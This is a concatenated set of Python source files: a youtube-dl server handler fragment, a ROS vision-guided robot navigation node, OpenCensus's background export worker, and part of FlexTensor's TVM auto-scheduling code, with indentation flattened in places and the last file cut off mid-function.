int(pending["type"]),
pending["format"], pending["url"])
job.id = pending["id"]
self.jobshandler.put((Actions.RESUME, job))
def join(self):
if self.thread is not None:
return self.thread.join()
def get_ydl_version(self):
return self.ydl_module.version.__version__
def get_ydl_extractors(self):
return [ie.IE_NAME for ie in self.ydl_module.extractor
.list_extractors(
self.app_config['ydl_options'].get('age-limit')
) if ie._WORKING]
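# Illustrative sketch (added; not shipped with ydl_server): a stand-alone copy
# of the option-dict to CLI-flag conversion performed by
# YdlHandler.get_ydl_full_cmd(), so the flag layout can be inspected without
# instantiating the handler. The option values and URL are placeholders.
def _example_cmd_layout_sketch():
    opt_dict = {'format': 'bestaudio', 'no-playlist': None, 'quiet': True, 'verbose': False}
    cmd = ['youtube-dl']
    for key, val in opt_dict.items():
        if isinstance(val, bool) and not val:
            continue  # a False flag is simply omitted
        cmd.append('--{}'.format(key))
        if val is not None and not isinstance(val, bool):
            cmd.append(str(val))
    cmd.append('https://example.com/some-video')
    # -> ['youtube-dl', '--format', 'bestaudio', '--no-playlist', '--quiet',
    #     'https://example.com/some-video']
    return cmd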
|
navigate_phy_parallel_controller.py
|
#! /usr/bin/python
# Copyright (c) 2015, Rethink Robotics, Inc.
# Using this CvBridge Tutorial for converting
# ROS images to OpenCV2 images
# http://wiki.ros.org/cv_bridge/Tutorials/ConvertingBetweenROSImagesAndOpenCVImagesPython
# Using this OpenCV2 tutorial for saving Images:
# http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_gui/py_image_display/py_image_display.html
# rospy for the subscriber
import rospy
# ROS Image message
from sensor_msgs.msg import Image, JointState
# ROS Image message -> OpenCV2 image converter
from cv_bridge import CvBridge, CvBridgeError
# from tf_listener import get_transformation, transform_point
# OpenCV2 for saving an image
import cv2
import numpy as np
import math
import actionlib
import fetch_api
import control_msgs.msg
from sensor_msgs.msg import PointCloud2
import trajectory_msgs.msg
import struct
from geometry_msgs.msg import Point, PointStamped, PoseStamped
from robotics_labs.msg import BoxTarget
import tf2_ros
import tf2_geometry_msgs
from threading import Thread
from multiprocessing import Process, Value, Array
MIN_PAN = -math.pi / 2
MAX_PAN = math.pi / 2
MIN_TILT = -math.pi / 2
MAX_TILT = math.pi / 4
PAN_JOINT = 'head_pan_joint'
TILT_JOINT = 'head_tilt_joint'
PAN_TILT_TIME = 2
# Instantiate CvBridge
bridge = CvBridge()
initBB = None
tracker = cv2.TrackerCSRT_create()
linear_speed = 0
angular_speed = Value('d', 0.0)
porpotion_prev = 0 # assuming fetch is facing the object
e_prev = 0
intergral_tilt = 0
traj_client = None
current_dist = 0
cx = None
cy = None
image_sub = None
dist_sub = None
tilt = Value('d', 0.0)
tf_buffer = None
stop = False
flush_count = 0
current_head_angle = 0
def controller():
print "process running"
global angular_speed
global linear_speed
global tilt
global traj_client
global stop
fetch_base = fetch_api.Base()
fetch_head = fetch_api.Head()
r = rospy.Rate(25)
while not rospy.is_shutdown() and not stop:
# print "publishing"
fetch_base.move(linear_speed, angular_speed.value)
point = trajectory_msgs.msg.JointTrajectoryPoint()
point.positions = [0, tilt.value]
point.time_from_start = rospy.Duration(2.5)
goal = control_msgs.msg.FollowJointTrajectoryGoal()
goal.trajectory.joint_names = [PAN_JOINT, TILT_JOINT]
goal.trajectory.points.append(point)
traj_client.send_goal(goal)
r.sleep()
# fetch_base.go_forward(0.35)
fetch_head.pan_tilt(0,0.8)
return
def joint_callback(msg):
    global current_head_angle
    try:
        current_head_angle = msg.position[5]
    except:
        pass
# print current_head_angle
def dist_callback(msg):
global current_dist
global cx
global cy
global tilt
global dist_sub
global stop
transform = tf_buffer.lookup_transform("base_link",
"head_camera_rgb_optical_frame", #source frame
rospy.Time(0),
rospy.Duration(5.0)) #get the tf at first available time
pose_goal = PoseStamped()
pose_goal.header.frame_id = "head_camera_rgb_optical_frame"
pose_goal.pose = msg.box_pose
pose_transformed = tf2_geometry_msgs.do_transform_pose(pose_goal, transform)
current_dist = pose_transformed.pose.position.x
if (not math.isnan(current_dist)) and current_dist < 0.92 and current_dist != 0:
print "stop set"
stop = True
print "current_dist = ", current_dist
def image_callback(msg):
global initBB
global tracker
global fetch_base
global linear_speed
global angular_speed
global porpotion_prev
global porpotion_tilt
global traj_client
global intergral_tilt
global cx
global cy
global image_sub
global tilt
global flush_count
global e_prev
# print("Received an image!")
# if (not math.isnan(current_dist)) and current_dist < 0.85 and current_dist != 0:
# fetch_base.move(0, 0)
# image_sub.unregister()
if flush_count < 5:
flush_count += 1
return
try:
# Convert your ROS Image message to OpenCV2
cv2_img = bridge.imgmsg_to_cv2(msg, "bgr8")
except CvBridgeError, e:
print(e)
else:
# Save your OpenCV2 image as a jpeg
# pass
# Change image to grayscale
height = cv2_img.shape[0]
width = cv2_img.shape[1]
if not initBB:
initBB = cv2.selectROI("Frame", cv2_img, fromCenter=False, showCrosshair=True)
tracker.init(cv2_img, initBB)
else:
linear_speed = 0.15
(success, box) = tracker.update(cv2_img)
(x, y, w, h) = [int(v) for v in box]
cv2.rectangle(cv2_img, (x, y), (x + w, y + h), (0, 255, 0), 2)
cx = x + w / (2 * 1.0)
cy = y + h / (2 * 1.0)
precentage = cx / (width * 1.0)
precentage_height = cy / (height * 1.0)
porpotion = -(precentage - 0.5)
differential = porpotion - porpotion_prev
SV = -0.8 + 2 * precentage_height#(precentage_height - 0.5)
e = SV
porpotion_tilt = e
differential_tilt = e - e_prev
# intergral_tilt += (precentage_height - 0.5)
angular_speed.value = porpotion + 0.001 * differential
tilt.value = current_head_angle + 1.5 * porpotion_tilt + 0.5 * differential_tilt
if tilt.value < 0.2:
tilt.value = 0.2
print "SV = ", SV, ", precentage_height = ", precentage_height
porpotion_prev = porpotion
e_prev = e
# Displaying the image
# fetch_base.move(linear_speed, angular_speed)
# point = trajectory_msgs.msg.JointTrajectoryPoint()
# point.positions = [0, tilt]
# point.time_from_start = rospy.Duration(PAN_TILT_TIME)
# goal = control_msgs.msg.FollowJointTrajectoryporpotion_tiltbporpotion_tiltporpotion_tiltGoal()
# goal.trajectory.joint_names = [PAN_JOINT, TILT_JOINT]
# goal.trajectory.points.append(point)
# traj_client.send_goal(goal)
cv2.imshow("Result",cv2_img)
cv2.waitKey(1)
def main():
global traj_client
global image_sub
global dist_sub
global tf_buffer
rospy.init_node('dewey_fetch_nav')
tf_buffer = tf2_ros.Buffer(rospy.Duration(1))
tf2_ros.TransformListener(tf_buffer)
traj_client = actionlib.SimpleActionClient('head_controller/follow_joint_trajectory', control_msgs.msg.FollowJointTrajectoryAction)
# Define your image topic
image_topic = "/head_camera/rgb/image_raw"
# Set up your subscriber and define its callback
image_sub = rospy.Subscriber(image_topic, Image, image_callback)
dist_sub = rospy.Subscriber("box_target", BoxTarget, dist_callback)
joint_sub = rospy.Subscriber("joint_states", JointState, joint_callback)
t = Thread(target=controller)
t.start()
# Spin until ctrl + c. You can also choose to spin once
while not rospy.is_shutdown():
if stop:
image_sub.unregister()
dist_sub.unregister()
joint_sub.unregister()
rospy.sleep(0.1)
rospy.spin()
t.join()
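# Illustrative sketch (added; not part of the original node): the proportional
# plus differential steering update from image_callback(), reproduced with plain
# numbers so the gains can be sanity-checked without ROS or a camera. Variable
# names deliberately follow the spellings used above.
def example_steering_update_sketch(cx, width, porpotion_prev):
    precentage = cx / (width * 1.0)
    porpotion = -(precentage - 0.5)
    differential = porpotion - porpotion_prev
    angular = porpotion + 0.001 * differential
    return angular, porpotion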
if __name__ == '__main__':
main()
|
async_.py
|
# Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import logging
import threading
from six.moves import queue
from six.moves import range
from opencensus.common.transports import base
_DEFAULT_GRACE_PERIOD = 5.0 # Seconds
_DEFAULT_MAX_BATCH_SIZE = 200
_WAIT_PERIOD = 60.0 # Seconds
_WORKER_THREAD_NAME = 'opencensus.common.Worker'
_WORKER_TERMINATOR = object()
class _Worker(object):
"""A background thread that exports batches of data.
:type exporter: :class:`~opencensus.trace.exporters.base.Exporter` or
:class:`~opencensus.stats.exporters.base.StatsExporter`
:param exporter: Instances of Exporter objects. Defaults to
                     :class:`.PrintExporter`. The other available options are
:class:`.ZipkinExporter`, :class:`.StackdriverExporter`,
:class:`.LoggingExporter`, :class:`.FileExporter`.
:type grace_period: float
:param grace_period: The amount of time to wait for pending data to
be submitted when the process is shutting down.
:type max_batch_size: int
:param max_batch_size: The maximum number of items to send at a time
in the background thread.
"""
def __init__(self, exporter, grace_period=_DEFAULT_GRACE_PERIOD,
max_batch_size=_DEFAULT_MAX_BATCH_SIZE):
self.exporter = exporter
self._grace_period = grace_period
self._max_batch_size = max_batch_size
self._queue = queue.Queue(0)
self._lock = threading.Lock()
self._event = threading.Event()
self._thread = None
@property
def is_alive(self):
"""Returns True is the background thread is running."""
return self._thread is not None and self._thread.is_alive()
def _get_items(self):
"""Get multiple items from a Queue.
Gets at least one (blocking) and at most ``max_batch_size`` items
(non-blocking) from a given Queue. Does not mark the items as done.
:rtype: Sequence
:returns: A sequence of items retrieved from the queue.
"""
items = [self._queue.get()]
while len(items) < self._max_batch_size:
try:
items.append(self._queue.get_nowait())
except queue.Empty:
break
return items
def _thread_main(self):
"""The entry point for the worker thread.
Pulls pending data off the queue and writes them in
batches to the specified tracing backend using the exporter.
"""
quit_ = False
while True:
items = self._get_items()
data = []
for item in items:
if item is _WORKER_TERMINATOR:
quit_ = True
# Continue processing items, don't break, try to process
# all items we got back before quitting.
else:
data.extend(item)
if data:
try:
self.exporter.emit(data)
except Exception:
logging.exception(
                        '%s failed to emit data. '
                        'Dropping %s objects from queue.',
                        self.exporter.__class__.__name__,
                        len(data))
for _ in range(len(items)):
self._queue.task_done()
# self._event is set at exit, at which point we start draining the
# queue immediately. If self._event is unset, block for
# _WAIT_PERIOD between each batch of exports.
self._event.wait(_WAIT_PERIOD)
if quit_:
break
def start(self):
"""Starts the background thread.
Additionally, this registers a handler for process exit to attempt
to send any pending data before shutdown.
"""
with self._lock:
if self.is_alive:
return
self._thread = threading.Thread(
target=self._thread_main, name=_WORKER_THREAD_NAME)
self._thread.daemon = True
self._thread.start()
atexit.register(self._export_pending_data)
def stop(self):
"""Signals the background thread to stop.
This does not terminate the background thread. It simply queues the
stop signal. If the main process exits before the background thread
processes the stop signal, it will be terminated without finishing
work. The ``grace_period`` parameter will give the background
thread some time to finish processing before this function returns.
:rtype: bool
:returns: True if the thread terminated. False if the thread is still
running.
"""
if not self.is_alive:
return True
with self._lock:
self._queue.put_nowait(_WORKER_TERMINATOR)
self._thread.join(timeout=self._grace_period)
success = not self.is_alive
self._thread = None
return success
def _export_pending_data(self):
"""Callback that attempts to send pending data before termination."""
if not self.is_alive:
return
# Stop blocking between export batches
self._event.set()
self.stop()
def enqueue(self, data):
"""Queues data to be written by the background thread."""
self._queue.put_nowait(data)
def flush(self):
"""Submit any pending data."""
self._queue.join()
class AsyncTransport(base.Transport):
"""Asynchronous transport that uses a background thread.
:type exporter: :class:`~opencensus.trace.exporters.base.Exporter` or
:class:`~opencensus.stats.exporters.base.StatsExporter`
:param exporter: Instances of Exporter objects. Defaults to
                     :class:`.PrintExporter`. The other available options are
:class:`.ZipkinExporter`, :class:`.StackdriverExporter`,
:class:`.LoggingExporter`, :class:`.FileExporter`.
:type grace_period: float
:param grace_period: The amount of time to wait for pending data to
be submitted when the process is shutting down.
:type max_batch_size: int
:param max_batch_size: The maximum number of items to send at a time
in the background thread.
"""
def __init__(self, exporter, grace_period=_DEFAULT_GRACE_PERIOD,
max_batch_size=_DEFAULT_MAX_BATCH_SIZE):
self.exporter = exporter
self.worker = _Worker(exporter, grace_period, max_batch_size)
self.worker.start()
def export(self, data):
"""Put the trace/stats to be exported into queue."""
self.worker.enqueue(data)
def flush(self):
"""Submit any pending traces/stats."""
self.worker.flush()
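# Illustrative usage sketch (added; not part of the original module). Any object
# with an emit(data) method satisfies what _Worker expects from an exporter, so
# an in-memory exporter is enough to observe the background batching. The names
# below are placeholders.
def _example_async_transport_sketch():
    class _ListExporter(object):
        def __init__(self):
            self.batches = []
        def emit(self, data):
            self.batches.append(list(data))
    exporter = _ListExporter()
    transport = AsyncTransport(exporter, grace_period=1.0, max_batch_size=10)
    transport.export(['span-1'])  # enqueued; picked up by the worker thread
    transport.flush()             # blocks until the queue has been drained
    return exporter.batches       # e.g. [['span-1']]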
|
scheduler.py
|
import os
import time
import signal
import shutil
import math
import tvm
import numpy as np
try:
import torch.multiprocessing as _multi
except ImportError:
import multiprocessing as _multi
multi = _multi.get_context("spawn")
from tvm import rpc
from collections import deque
from queue import Empty
from functools import reduce
from tvm.micro.base import compile_micro_mod
from flextensor.task import TASK_TABLE
from flextensor.intrinsic import get_intrin_table
try:
from flextensor.model import WalkerGroup
except ImportError:
print("[Warning] Import model module failed, please check if PyTorch is installed.")
from flextensor.space import generate_space_inter_op, generate_space_intra_op, \
generate_empty_space_inter_op, generate_op_space_with_intrin
from flextensor.utils import assert_print, to_int, to_tuple, Config, RpcInfo
try:
import psutil
except ImportError:
raise RuntimeError("psutil not found, please install it [Hint: `pip install psutil`]")
from flextensor.utils import get_iter_info, shift
import json
import random
# import flextensor.ppa_model as ppa
# from flextensor.ppa_model import measure_latency
LIB_DIR = "lib"
LOCAL_RPC = False
def flatten_graph(ops):
bfs_order = []
down_graph = {}
visited = set()
q = deque()
for op in ops:
q.append(op)
visited.add(op)
while q:
cur = q.popleft()
if isinstance(cur, tvm.tensor.ComputeOp):
bfs_order.append(cur)
for t in cur.input_tensors:
if t.op not in visited:
visited.add(t.op)
q.append(t.op)
if t not in down_graph:
down_graph[t] = []
down_graph[t].append(cur)
return list(reversed(bfs_order)), down_graph
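# Illustrative sketch (added; not part of FlexTensor): builds a tiny two-stage
# compute graph with the legacy top-level TVM API (consistent with the
# tvm.tensor.ComputeOp check above) and flattens it, so the producer-before-
# consumer ordering returned by flatten_graph() can be checked in isolation.
def _example_flatten_graph_sketch():
    A = tvm.placeholder((16,), name="A")
    B = tvm.compute((16,), lambda i: A[i] + 1, name="B")
    C = tvm.compute((16,), lambda i: B[i] * 2, name="C")
    order, down_graph = flatten_graph([C.op])
    assert order.index(B.op) < order.index(C.op)  # producers come first
    return order, down_graph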
def verify_code(stmt, target, dev_id):
if target == "cuda":
        ctx = tvm.nd.context(target, dev_id)  # use the requested device
if not ctx.exist:
# print("Fail to get device %s devid=%d"%(target, dev_id))
return False
max_dims = ctx.max_thread_dimensions
check_gpu = {
"max_shared_memory_per_block": ctx.max_shared_memory_per_block,
"max_threads_per_block": ctx.max_threads_per_block,
"max_thread_x": max_dims[0],
"max_thread_y": max_dims[1],
"max_thread_z": max_dims[2]
}
valid = tvm.ir_pass.VerifyGPUCode(stmt, check_gpu)
return valid
else:
# no barrier for other targets
return True
def build_func(func_name, task_key, configs, op_pos=None, rpc_info=None, rewrite=False):
if rpc_info is not None and rpc_info.target_host is not None:
target_host = rpc_info.target_host
else:
target_host = None
task = TASK_TABLE[task_key]
    try:
        s, bufs = schedule_with_config(task_key, configs, op_pos=op_pos, rewrite=rewrite)
    except Exception as e:
        print(e)
        # re-raise so the caller sees the scheduling error instead of a NameError below
        raise
stmt = tvm.lower(s, bufs, simple_mode=True)
# print(stmt)
valid = verify_code(stmt, task.target, task.dev_id)
if not valid:
raise RuntimeError("Invalid %s(%d) kernel" % (task.target, task.dev_id))
if target_host is not None:
if task.target == "micro":
target = rpc_info.target # can be "c -device=micro_dev"
micro_device_config = rpc_info.micro_device_config
aux_sources = rpc_info.aux_sources
aux_options = rpc_info.aux_options
func = tvm.build(s, bufs, target=target)
mod_path = os.path.join(LIB_DIR, func_name + ".obj")
compile_micro_mod(mod_path,
func, micro_device_config,
aux_sources=aux_sources,
aux_options=aux_options)
# func.export_library(os.path.join(LIB_DIR, func_name))
else:
func = tvm.build(s, bufs, target=task.target, target_host=target_host)
func.export_library(os.path.join(LIB_DIR, func_name))
else:
func = tvm.build(s, bufs, target=task.target)
func.export_library(os.path.join(LIB_DIR, func_name))
result = ([to_tuple(x.shape) for x in bufs], [buf.dtype for buf in bufs])
return result
def eval_func(func_file, bufs_shape, dtype, target, number=1, dev_id=0, rpc_info=None):
"""
the target is preprocessed
"""
if rpc_info is not None:
host = rpc_info.host
port = rpc_info.port
server_ip = rpc_info.server_ip
server_port = rpc_info.server_port
device_key = rpc_info.device_key
else:
# local
host = "0.0.0.0"
port = 9090 # default port
server_ip = "127.0.0.1"
server_port = 9190
device_key = "local"
if device_key == "local":
if LOCAL_RPC:
use_rpc = True
else:
use_rpc = False
else:
use_rpc = True
if use_rpc:
# remote = rpc.connect(host, port)
tracker = rpc.connect_tracker(server_ip, server_port)
remote = tracker.request(device_key, priority=1,
session_timeout=10000)
ctx = remote.context(target, dev_id)
else:
ctx = tvm.context(target, dev_id)
tvm_arys = []
for i, shape in enumerate(bufs_shape):
shape = to_tuple(shape)
tmp = np.random.uniform(0, 1, size=shape).astype(dtype[i])
tmp = tvm.nd.array(tmp, ctx)
tvm_arys.append(tmp)
    time_cost = float("inf")  # returned when upload/build/evaluation fails
    try:
        if use_rpc:
            if target == "c -device=micro_dev":
                post_fix = ".obj"
            else:
                post_fix = ""
            remote.upload(os.path.join(LIB_DIR, func_file + post_fix))
            func = remote.load_module(func_file + post_fix)
        else:
            func = tvm.module.load(os.path.join(LIB_DIR, func_file))
        evaluator = func.time_evaluator(func.entry_name, ctx, number=number)
        time_cost = evaluator(*tvm_arys).mean * 1e3
    except Exception as e:
        print(e)
    finally:
        while len(tvm_arys) > 0:
            del tvm_arys[-1]
    return time_cost
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def exec_func(func, queue, args, kwargs):
try:
res = func(*args, **kwargs)
except Exception as e:
res = RuntimeError(str(e))
queue.put(res)
def parallel_execute(func, timeout, *args, **kwargs):
q = multi.Queue()
p = multi.Process(
target=call_with_timeout,
args=(func, q, timeout, args, kwargs))
p.start()
return Result(p, q)
def call_with_timeout(func, queue, timeout, args, kwargs):
q = multi.Queue()
p = multi.Process(target=exec_func, args=(func, q, args, kwargs))
p.start()
try:
res = q.get(block=True, timeout=timeout)
except Empty:
res = multi.TimeoutError()
except Exception as e:
print("Exception in process {}: {}".format(os.getpid(), str(e)))
res = e
kill_child_processes(p.pid)
p.terminate()
p.join()
queue.put(res)
def find_idle_cpu():
return 0
def find_idle_gpu():
return 0
def find_idle_device(target):
if target == "llvm":
return find_idle_cpu()
elif target == "cuda":
return find_idle_gpu()
else:
raise RuntimeError("Currently no support for target %s" % target)
class Scheduler(object):
def __init__(self, name, task_key, space, parallel=2, timeout=4.0, trial=100, number=1, early_stop=30,
rpc_info=None, rewrite=False, re_evalutate_number=10, warm_up_epoch=20, warm_up_number=20):
self.task_key = task_key
self.space = space
self.parallel = max(parallel, 1) # at least 1
self.timeout = timeout
self.trial = trial
self.number = number
self.early_stop = early_stop
self.task = TASK_TABLE[self.task_key]
self.walker_group = WalkerGroup(self.task.category + "_" + name, self.space)
self.rpc_info = rpc_info
self.rewrite = rewrite
self.re_evalutate_number = re_evalutate_number
self.warm_up_epoch = warm_up_epoch
self.warm_up_number = warm_up_number
def _warm_up(self, warm_up_epoches, warm_up_trials, configs, type_keys, max_repeat=20, use_model=False):
# perform warmup
warm_up_enough = False
count_repeat = 0
old_timeout = self.timeout
while not warm_up_enough:
for ep in range(warm_up_epoches):
warm_up_ret = self.walker_group.forward(warm_up_trials, policy="random")
warm_up_configs = [{} for i in range(warm_up_trials)] # empty configs
warm_up_indices = [{} for i in range(warm_up_trials)] # the indices
for count in range(warm_up_trials):
config = warm_up_configs[count]
for type_key in type_keys:
config[type_key] = []
for name in self.space.types[type_key]:
entity = warm_up_ret[name][0][count]
warm_up_indices[count][name] = warm_up_ret[name][1][count]
config[type_key].append(entity)
# hack here
# if self.op_pos == 1:
# warm_up_configs[count] = {
# "spatial": [[1, 1, 1, 1], [64, 2, 8, 1], [1, 1, 7, 1], [1, 1, 7, 1]],
# "reduce": [[64, 1, 16], [1, 3, 1], [1, 1, 3]],
# "unroll": [[1500, 1]]
# }
# hack here
# warm_up_configs[count] = {"inline": [[False, False]]}
# print(warm_up_configs)
if use_model:
warm_up_results = self.walker_group.query_performance(warm_up_indices)
else:
warm_up_results = self.parallel_evaluate(configs, warm_up_configs, number=self.number)
# the results are really measured
self.walker_group.add_perf_data(warm_up_indices, warm_up_results)
string = "[ "
for res in warm_up_results:
string += "%.6f " % res
string += "]"
# print("warm up [%.6f] %s" % (time.time(), string))
for count in range(warm_up_trials):
if warm_up_results[count] < float("inf"):
self.walker_group.record(warm_up_indices[count], warm_up_results[count])
# if not found valid config
if not self.walker_group.top1():
# print("Warning: No valid schedule found in warm up process, please use more trials")
#qprint("Now automatically use more trials, increase %d" % warm_up_trials)
warm_up_epoches = 1
count_repeat += 1
self.timeout = min(2 * self.timeout, 40)
if count_repeat >= max_repeat:
print("Fail to find valid schedule, too many errors")
warm_up_enough = True
else:
warm_up_enough = True
self.timeout = old_timeout
def _random_schedule(self, configs, type_keys, use_model=False):
# prepare model
if use_model:
self.walker_group.load_or_create_model()
# random by warm-up
for trial in range(self.trial):
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
return self.walker_group.to_config(self.walker_group.top1())
def _searching_schedule(self, configs, type_keys, use_model=False, early_stop=15):
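        """Local-search tuning: after a warm-up phase, repeatedly expand a
        randomly chosen top point in all directions, record rewards for the
        walkers, retire local minima, and periodically re-evaluate the best
        candidates with real measurements. Stops on the trial budget or when
        the best value stagnates. Returns the best configuration found.
        """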
# prepare model
if use_model:
self.walker_group.load_or_create_model()
# warm up
warm_up_epoches = self.warm_up_number
warm_up_trials = self.warm_up_number
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# tune
minimal = [{}, float("inf")] # the minimal point found before
retired_indices = [] # list of local minimals
part = math.ceil(self.trial / 20)
value_early_stop = self.walker_group.top1_value()
early_stop_count = 0
count_incessant_empty_trial = 0
for trial in range(self.trial):
if (not self.walker_group.has_more()) and trial < early_stop:
# nothing to tune, re-warm up
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
continue
elif trial >= early_stop:
break
from_indices, from_value = self.walker_group.top_random(with_value=True)
# # print("check from", from_indices)
# get all directions
next_indices_lst, action_lst = self.walker_group.full_walk(from_indices, no_repeat=True)
# # print("check action", action_lst)
next_configs = [self.walker_group.to_config(indices) for indices in next_indices_lst]
# if empty
if len(next_configs) < 1:
count_incessant_empty_trial += 1
else:
count_incessant_empty_trial = 0
if use_model:
results = self.walker_group.query_performance(next_indices_lst)
else:
results = self.parallel_evaluate(configs, next_configs, number=self.number)
            # these results come from real measurements (not the model)
self.walker_group.add_perf_data(next_indices_lst, results)
string = "[ "
for res in results:
string += "%.6f " % res
string += "]"
#qprint("tune [%.6f] %s" % (time.time(), string))
rewards = [np.tanh(max(from_value - result, 0.0)) for result in results]
is_local_minimal = True
for indices, action, reward, result in zip(next_indices_lst, action_lst, rewards, results):
self.walker_group.add_data(
action[0], # name
from_indices, # pre_state
action[1], # action
indices, # post_state
reward # reward
)
self.walker_group.record(indices, result, random_reject=True)
if result < self.walker_group.top1_value():
is_local_minimal = False
            # pop the current top point if it is a local minimum or there was no further exploration
if is_local_minimal or count_incessant_empty_trial > 0:
top = self.walker_group.pop_top()
if top.value < minimal[1]:
if minimal[1] < float("inf"):
retired_indices.append(minimal)
minimal[1] = top.value
minimal[0] = top.indices
else:
retired_indices.append([top.indices, top.value])
# report best
if self.walker_group.top1_value() < minimal[1]:
cur_best_value = self.walker_group.top1_value()
cur_best = self.walker_group.top1()
else:
cur_best_value = minimal[1]
cur_best = minimal[0]
#qprint("No. %d | [%.6f] The best currently %.6f" % (trial, time.time(), cur_best_value), cur_best)
            # early stop because of lasting empty trials
if count_incessant_empty_trial >= self.early_stop:
#qprint("Early stop after continuous no trials %d times" % (count_incessant_empty_trial))
break
# early stop because of repeating value
if math.fabs(cur_best_value - value_early_stop) < 0.02:
early_stop_count += 1
else:
value_early_stop = cur_best_value
early_stop_count = 0
if early_stop_count >= self.early_stop:
#qprint("Early stop with value %f repeats %d times" % (value_early_stop, early_stop_count))
break
# train and re-evaluate
if (trial + 1) % part == 0:
if not use_model:
# re-evaluate
if minimal[1] < float("inf"):
self.walker_group.record(minimal[0], minimal[1], random_reject=False)
for retired in retired_indices:
self.walker_group.record(retired[0], retired[1], random_reject=False)
minimal[0] = {}
minimal[1] = float("inf")
indices_lst = self.walker_group.topk(self.re_evalutate_number, modify=True)
next_configs = [self.walker_group.to_config(indices) for indices in indices_lst]
# use serialized evaluation
old_parallel = self.parallel
if self.task.target == "cuda":
self.parallel = 1
else:
self.parallel = 1 # min(self.parallel, os.cpu_count())
results = self.parallel_evaluate(configs, next_configs, number=self.number)
# recover parallel number
self.parallel = old_parallel
self.walker_group.add_perf_data(indices_lst, results)
string = "[ "
for res in results:
string += "%.6f " % res
string += "]"
#qprint("re-evaluate [%.6f] %s" % (time.time(), string))
for indices, result in zip(indices_lst, results):
if result < float("inf"):
# if inf, maybe this measure is wrong
self.walker_group.record(indices, result, random_reject=False)
# dump data
# self.walker_group.dump_data()
self.walker_group.clear_data()
# re-warm up
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# the best
if self.walker_group.top1_value() < minimal[1]:
best = self.walker_group.top1()
best_value = self.walker_group.top1_value()
else:
best = minimal[0]
best_value = minimal[1]
# print("[%.6f] The best latency is %.6f" % (time.time(), best_value))
return self.walker_group.to_config(best)
def _q_schedule(self, configs, type_keys, use_model=False):
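        """Walker-model guided tuning: walk from the current top-k points,
        record rewards, and periodically train the walkers and re-evaluate
        the best candidates. Returns the best configuration found.
        """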
# prepare model
self.walker_group.load_walker_model()
if use_model:
self.walker_group.load_or_create_model()
# warm up
warm_up_epoches = 10
warm_up_trials = 20
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# record best
best = self.walker_group.top1()
best_value = self.walker_group.top1_value()
retired_indices = []
# early stop value
value_early_stop = best_value
early_stop_count = 0
# determine start points
cur_lst = self.walker_group.topk(self.parallel, modify=True, with_value=True)
part = math.ceil(self.trial / 5)
for trial in range(self.trial):
from_lst, next_points, action_lst = self.walker_group.walk(cur_lst, trial)
if use_model:
results = self.walker_group.query_performance(next_points)
else:
next_configs = [self.walker_group.to_config(indices) for indices in next_points]
results = self.parallel_evaluate(configs, next_configs, number=self.number)
self.walker_group.add_perf_data(next_points, results)
for indices, action, (from_indices, from_value), result in zip(next_points, action_lst, from_lst, results):
reward = np.tanh(max(from_value - result, 0.0))
self.walker_group.add_data(
action[0], # name
from_indices, # pre_state
action[1], # action
indices, # post_state
reward # reward
)
self.walker_group.record(indices, result, random_reject=True)
# update best
if self.walker_group.top1_value() < best_value:
best_value = self.walker_group.top1_value()
best = self.walker_group.top1()
print("No. %d | [%.6f] The best currently %.6f" % (trial, time.time(), best_value), best)
# early stop
if math.fabs(best_value - value_early_stop) < 0.02:
early_stop_count += 1
else:
value_early_stop = best_value
early_stop_count = 0
if early_stop_count >= self.early_stop:
#qprint("Early stop with value %f repeats %d times" % (value_early_stop, early_stop_count))
break
# empty, stop
if not self.walker_group.has_more():
#qprint("No more points, end of scheduling")
break
# reload next points
retired_indices.extend(cur_lst)
cur_lst = self.walker_group.topk(self.parallel, modify=True, with_value=True)
if (trial + 1) % part == 0:
self.walker_group.train_walkers()
if not use_model:
# re-evaluate
if best_value < float("inf"):
self.walker_group.record(best, best_value, random_reject=False)
best = {}
best_value = float("inf")
for indices, value in retired_indices[-self.parallel:-1]:
self.walker_group.record(indices, value, random_reject=False)
indices_lst = self.walker_group.topk(self.parallel, modify=True)
#qprint("check next indices:", indices_lst)
next_configs = [self.walker_group.to_config(indices) for indices in indices_lst]
results = self.parallel_evaluate(configs, next_configs, number=self.number)
self.walker_group.add_perf_data(indices_lst, results)
string = "[ "
for res in results:
string += "%.6f " % res
string += "]"
#qprint("re-evaluate [%.6f] %s" % (time.time(), string))
for indices, result in zip(indices_lst, results):
self.walker_group.record(indices, result, random_reject=False)
# re-warm up
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# update best
if self.walker_group.top1_value() < best_value:
best_value = self.walker_group.top1_value()
best = self.walker_group.top1()
# dump data at last
# self.walker_group.dump_data()
self.walker_group.clear_data()
return self.walker_group.to_config(best)
def parallel_evaluate(self, old_configs, new_configs, number=1):
raise NotImplementedError()
def _parallel_evaluate(self, old_configs, new_configs, mode="op", number=1):
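        """Compile and measure `new_configs` in batches of `self.parallel`.
        Both the build and the evaluation run in separate processes guarded
        by `self.timeout`; any failure or timeout is reported as float("inf").
        """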
# # print("check config", old_configs, new_configs)
# print("parallel_evaluate begins...")
target = self.task.target
if target == "micro":
assert self.rpc_info is not None
target = self.rpc_info.target
total_configs = len(new_configs)
total_res_lst = []
try:
os.mkdir(LIB_DIR)
except OSError as e:
